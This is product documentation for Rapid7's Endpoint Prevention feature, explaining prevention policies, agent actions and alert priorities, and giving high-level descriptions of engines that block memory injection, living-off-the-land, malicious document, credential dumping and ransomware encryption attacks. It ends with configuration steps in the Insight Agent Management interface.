Configure your Endpoint Prevention strategy with policies

Endpoint Prevention is available to Managed Detection and Response and Managed Threat Complete customers who also have the Next-Generation Antivirus or Ransomware Prevention add-ons.

The policy attached to a prevention group is composed of categories of detection logic called prevention engines. Each engine is designed to detect specific threats and instruct the Insight Agent on what action to take when a threat is detected. You can tune the behavior of each engine individually, and select which engines to use collectively, to meet the goals of your Endpoint Prevention program.

This article provides a breakdown of prevention policies in general and each prevention engine you can implement in your policies, explains what behavior they are designed to detect, covers how the agent can take action against threats, and guides you through the configuration process.

Prevention policy rules and characteristics

A prevention policy exists solely within a prevention group and has a one-to-one relationship with that group. A group's policy defines what prevention engines should be actively monitoring the group's member agents for threats.

You have full configuration control over the policies attached to your custom prevention groups. An exception to this is the default prevention group and the default prevention policy attached to it. This policy is immutable and its configuration is maintained solely by Rapid7.

Agent actions

You can separately configure how the Insight Agent will respond to detected threats for each prevention engine in your policy. Overall, the Insight Agent is capable of these actions:

  • Block - The Insight Agent will actively block any threat detected by the prevention engine and generate an alert in InsightIDR. Depending on the context of the threat, this could involve terminating malicious processes, denying access to files, and other active prevention methods.
  • Disinfect - Specific to the On-Access Scanning engine, the Insight Agent will attempt to remove the detected threat from affected files and generate an alert in InsightIDR.
  • Detection Only - The Insight Agent will take no action other than generating an alert in InsightIDR.
    • This setting functionally disables Endpoint Prevention's ability to play an active role in safeguarding your assets. You may determine that some asset behaviors do not warrant agent intervention beyond generating alerts in your environment, but be aware that you will need to be responsible for handling threats detected in these circumstances.

Rule priority

Like agent actions, you can separately configure the priority level of alerts generated by each of your prevention engines in your policy. When your security team sees these alerts in InsightIDR, the priority level you assign here will be tagged in the alert itself.

Endpoint Prevention supports these priority levels:

  • Low
  • Medium
  • High

How you contextualize these priority levels for your security team is up to you.

Prevention engine details

Prevention engines protect your assets from ransomware and other forms of malware that use common types of evasive techniques. The following prevention engines are available for use and configuration in your policies. This section provides a high-level explanation of what each of these engines detect.

Prevention engines included in your license

If the On-Access Scanning (Antivirus) prevention engine documented here does not appear in your environment, check your license or contact Rapid7 if you wish to upgrade. If you do not have this prevention engine, antivirus scans won't be run, but the other prevention engines will operate as usual. You can also use a third-party antivirus product: the advanced prevention engines will operate and run alongside it.

On-Access Scanning (Antivirus)

The On-Access Scanning prevention engine scans local and network files for viruses in real-time when a user accesses them, such as when a file is opened, moved, copied, or executed. When infected files are detected, you can decide the action you want to take on them.

In addition to the Block and Detection Only agent actions, On-Access Scanning is the only engine that can also instruct the agent to run the Disinfect action, which attempts to remove the detected threat from affected files.

The Antivirus Health indicator shown for each agent in your Agents table is tied directly to the status of this prevention engine in each of your policies.

On-Access Scanning also includes additional configuration options that allows you to tune the scope of its scanning capabilities:

These scanning options are potentially resource-intensive

Depending on the contents and behaviors of your assets, they may experience a performance impact if your policy specifies additional scanning options beyond the recommended configuration set by the default prevention policy.

  • Scan Email - Enables the scanning of plaintext emails, email databases, and disinfection inside those databases.
  • Scan Potentially Unwanted Applications (PUA) - Enables the scanning of programs that may be unwanted on the asset, such as those that come bundled with free software.
  • Scan Archives - Enables the scanning of file archives (such as "recently deleted") during a content scan.
  • Scan Packed - Enables scanning and disinfection inside packed executables.
  • Antimalware Scan Interface (AMSI) - Enables the scanning of scripts, files, and similar content coming from other programs for malware before they can make changes to the asset.

Memory Injection Attacks

Some malicious software can inject and hide itself in a legitimate process. The Memory Injection Attacks prevention engine stops fileless threats and blocks code execution from the file system, causing such malware to exit or crash.

More information

Why it’s used

Previously, malware attacks typically involved malicious processes, which either carried out the attack or downloaded a file-based payload with malicious code. These processes were found by threat analysts and security software that listed running processes, distinguishing suspicious processes from legitimate ones.

How it’s used

Malware authors are now aware of this countermeasure and have created a way to circumvent it, using techniques known as process injection or memory injection.

Process and memory injection make it harder for security tools to detect malicious processes. These techniques run malicious code in the address space–the range of valid addresses in-memory, which are allocated for a particular program or process–of a legitimate process or a sensitive OS process. Sometimes, malware also unpacks malicious code into its own process as a form of self-injection, creating a skeleton process that is already present in memory.

How Endpoint Prevention blocks it

Endpoint Prevention stops fileless and other memory-resident malware from hiding in legitimate processes and evading detection. For example, Ransomware Prevention deceives the malware about its ability to unpack code solely in a process’ memory space without exposing or loading a dynamic link library (DLL) into the process memory, stopping the attack before it does any damage.

Resulting actions

The code injection is blocked from unpacking itself in the destination or targeted process.

Forensic information available in alerts

In addition to the standard details, the resulting alert provides information about the destination process and the malware targeted for injection. It also provides a list of all loaded modules (DLLs) in the process that triggered the alert.

Living-Off-the-Land Attacks

Different from classic forms of malware, a Living-Off-the-Land attack attempts to cause damage by misusing tools that are built into the system. The Living-Off-the-Land Attacks prevention engine blocks the malicious software's ability to leverage such tools to infect an asset.

More information

Why it’s used

Living off the land (LOTL or LOL) is an evasion technique that takes advantage of trusted system utilities, libraries, tools, and components, which are native to the operating system. The operations that this software performs appear to be legitimate, even though they are performed on behalf of a threat actor.

How it’s used

Malware uses LOLbins to perform operations, which appear to be typical. For example, malware can perform lateral movement, download malicious artifacts, and move to another stage of attack without triggering an alert. These operations can use trusted utilities and components, including those that are digitally signed.

How Endpoint Prevention blocks it

Endpoint Prevention stops unwanted process relationship executions by hiding LOLbins. This makes it impossible for attackers to find them and use them to continue their attack.

Resulting actions

Endpoint Prevention blocks processes from spawning LOLbins’ executions.

Forensic information available in alerts

In addition to the standard details, the resulting alert provides information about the blocked command, which executed the child process.

Malicious Document Attacks

Malicious documents can sometimes misuse features such as macros, scripts, and built-in tools. The Malicious Document Attacks prevention engine disarms the malicious documents' attempts and allows applications to operate without being infected.

More information

Why it’s used

Threat actors use documents to lure victims through phishing or social engineering attacks, allowing them to deliver malicious code and gain a foothold on a machine. Traditional antivirus (AV) tools and threat analysts typically detect malware by comparing the hash of the document file to the malware hashes in their database.

However, it’s more difficult to detect malicious activity in popular software that’s used to open these documents, such as Microsoft Office or Adobe. This software is often misused as an evasive technique, carrying out the document’s malicious code on its behalf while remaining undetected, since the software is considered legitimate.

How it’s used

Malware uses legitimate document software to run macros, open script interpreters, obfuscate malicious code, use add-ons and extensions, download scripts, execute another executable program, and more.

How Endpoint Prevention blocks it

Endpoint Prevention isolates the document in the container software used to open it by preventing interaction with other script interpreters and executables that appear unusual or risky.

Resulting actions

Endpoint Prevention blocks malware from spawning risky child processes’ executions.

Forensic information available in alerts

In addition to the standard details, the resulting alert provides information about the blocked command that executed the child process.

OS Credential Dumping Attacks

Attackers or malware can sometimes attempt to harvest operating system credentials to gain access to an environment. The OS Credential Dumping Attacks prevention engine protects sensitive files, processes, and other key artifacts to prevent this type of threat.

More information

Why it’s used

It takes multiple steps for ransomware to be successful, including shutting down security controls and accessing restricted information to hold for ransom. Spreading through a network requires lateral movement, where attackers can attempt to dump credentials, allowing them to obtain account logins that enable their malware to move laterally.

How it’s used

Adversaries might attempt to access credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS). They can deploy tools that allow them to extract this data, exploit legitimate applications and processes, and use LOLbins to dump sensitive, credential information.

How Endpoint Prevention blocks it

Endpoint Prevention cloaks sensitive files, processes, and other artifacts, preventing attackers or their malware from harvesting credentials or other sensitive data—even if the threat finds a way to run on the system.

Resulting actions

Endpoint Prevention monitors API calls that attempt to access credentials stored in process memory of the LSASS, preventing access to this area and snapshot dumping using an LOLbin.

Forensic information available in alerts

In addition to the standard details, the resulting alert provides information about the sensitive asset where credential harvesting was attempted. It also provides the block command line involved in the attempt.

File and Process Manipulation Attacks

Malicious software can attempt to manipulate other software applications and processes to gain access to an asset’s internal files. This prevention engine prevents malware from making deceptive modifications to files and processes.

More information

Why it’s used

Traditional antivirus (AV) tools and threat analysts typically detect malware by comparing the hash of a file or process with the malware hashes in their database. Additionally, file systems often require dedicated permissions or access controls.

Making too many changes on a file system can trigger existing endpoint security controls, which block malware activity. However, legitimate programs with direct access can read and write files directly from the drive by analyzing file systems. These programs can access sensitive or vulnerable files in a way that doesn’t raise suspicion.

How it’s used

To avoid detection, adversaries abuse programs that already have direct access to file systems and can read and write files directly from the drive. These programs can be used to access sensitive files and then read, write, or execute on the malware’s behalf. This technique can bypass Windows file access controls and file system monitoring tools.

How Endpoint Prevention blocks it

To prevent the evasive techniques that exploit access to a file system, Endpoint Prevention can control access to the file system, making it inaccessible or unchangeable.

Resulting actions

Endpoint Prevention blocks attempts from the malicious process to access restricted file systems by manipulating the access controls to the file or path.

Forensic information available in alerts

In addition to the standard details, the resulting alert provides information about the blocked path that the process attempted to reach.

Data Encryption Attacks

Malicious software, particularly ransomware, can introduce processes that silently encrypt files. If this behavior is detected, Endpoint Prevention will terminate the destructive process.

More information

Why it’s used

Encryption occurs often in a Windows OS and is not necessarily malicious. Many built-in and third-party tools use native OS functions and methods of encryption to meet their functional requirements. These encryption methods, which are usually unmonitored, are often time and resource intensive.

Encryption makes it harder for endpoint security tools and threat analysts to identify ransomware as malicious. However, once the ransomware is detected, a signature is immediately created, preventing further infections.

How it’s used

Malware authors are aware of this technical challenge and have created a way to avoid it, using hidden or nested threads that allow them to execute their malicious code quickly while remaining unnoticed.

How Endpoint Prevention blocks it

Endpoint Prevention blocks ransomware’s attempts to hide in process threads. Instead of monitoring the encryption method itself, Endpoint Prevention monitors suspicious thread activities, rendering this technique ineffective.

Resulting actions

Endpoint Prevention terminates the process initiating hidden or nested threads.

Forensic information available in alerts

In addition to the standard details, the resulting alert provides information about the process that initiated the attack.

How to configure a prevention policy

How to access the Agent Management interface

All aspects of your Endpoint Prevention program are configurable in the Agent Management experience of Insight Platform Home. Your Insight account must have either the Platform Administrator role or a Product Administrator role to access Agent Management:

  1. Go to https://insight.rapid7.com/login and sign in with your Insight account email address and password.
    • If you are not directed to Insight Platform Home upon successfully signing in, open the navigator in the upper left corner of your screen and click Insight Platform Home.
  2. Open the Data Collection tab in the left menu and click Agents.
    • Use the dropdown next to Agent Management to select the organization for which you want to configure Endpoint Prevention. If you only have access to 1 organization, it will already be selected.

To configure a prevention policy:

  1. Click the Endpoint Prevention tab in Agent Management. The Prevention Groups subtab will already be selected.
  2. In your Prevention Groups table, browse to the custom prevention group you want to configure a policy for and click its table row. The Edit Prevention Group interface will display.
  3. Scroll to the Prevention Policy Configuration section. The policy will be locked initially, so click Edit Policy to unlock all configuration options.
  4. Use the sliders to select which prevention engines the policy should use.

Make your engine choices carefully!

If you turn off an engine for this policy, agents associated with this prevention group will be unable to detect, and therefore, unable to alert and act on any threat this engine would have otherwise detected. If you choose to turn off a prevention engine, do so carefully and with clear intentions.

As an alternative to turning off a prevention engine, consider keeping it enabled in Detection Only mode so you continue to receive alerts on detected activity.

  1. Configure what action the Insight Agent should take for each engine and what priority their corresponding alerts should be tagged with.
    • For the On-Access Scan prevention engine, use the check boxes to configure the scope of the engine's scanning functionality.
  2. Click Save Changes when finished, or Cancel to abandon your progress and return the policy to its prior saved state.